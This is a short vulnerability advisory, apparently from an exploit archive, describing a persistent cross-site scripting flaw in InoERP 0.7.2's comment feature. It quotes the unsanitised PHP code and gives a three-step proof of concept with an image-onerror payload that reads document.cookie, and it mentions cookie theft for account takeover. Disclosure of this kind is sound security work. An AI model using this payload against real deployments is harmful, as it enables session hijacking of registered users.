InoERP 0.7.2 Persistent Cross-Site Scripting

2019.10.04
Credit: strider
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: InoERP 0.7.2 - Persistent Cross-Site Scripting # Google Dork: None # Date: 2019-09-14 # Exploit Author: strider # Vendor: http://inoideas.org/ # Software Link: https://github.com/inoerp/inoERP # Version: 0.7.2 # Tested on: Debian 10 Buster x64 / Kali Linux # CVE : None ====================================[Description]==================================== There is a security flaw on the comment section, which allows to make persistant xss without any authentication. An attacker could use this flaw to gain cookies to get into a account of registered users. ====================================[Vulnerability]==================================== extensions/comment/post_comment.php in the server part $$extension = new $extension; foreach ($field_array as $key => $value) { if (!empty($_POST[$value])) { $$extension->$value = trim(mysql_prep($_POST[$value])); <-- escaping for htmlentities } else { $$extension->$value = ""; } } includes/functions/functions.inc in the server part function mysql_prep($value) { return $value; <-- just returns the value } ====================================[Proof of Concept]==================================== Step 1: http://your-server-ip/content.php?mode=9&content_type=forum&category_id=7 Step 2: open a new question and submit it. Step 3: then paste this PoC-Code below into the comment field and submit that <img src=# onerror="alert(document.cookie);">


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top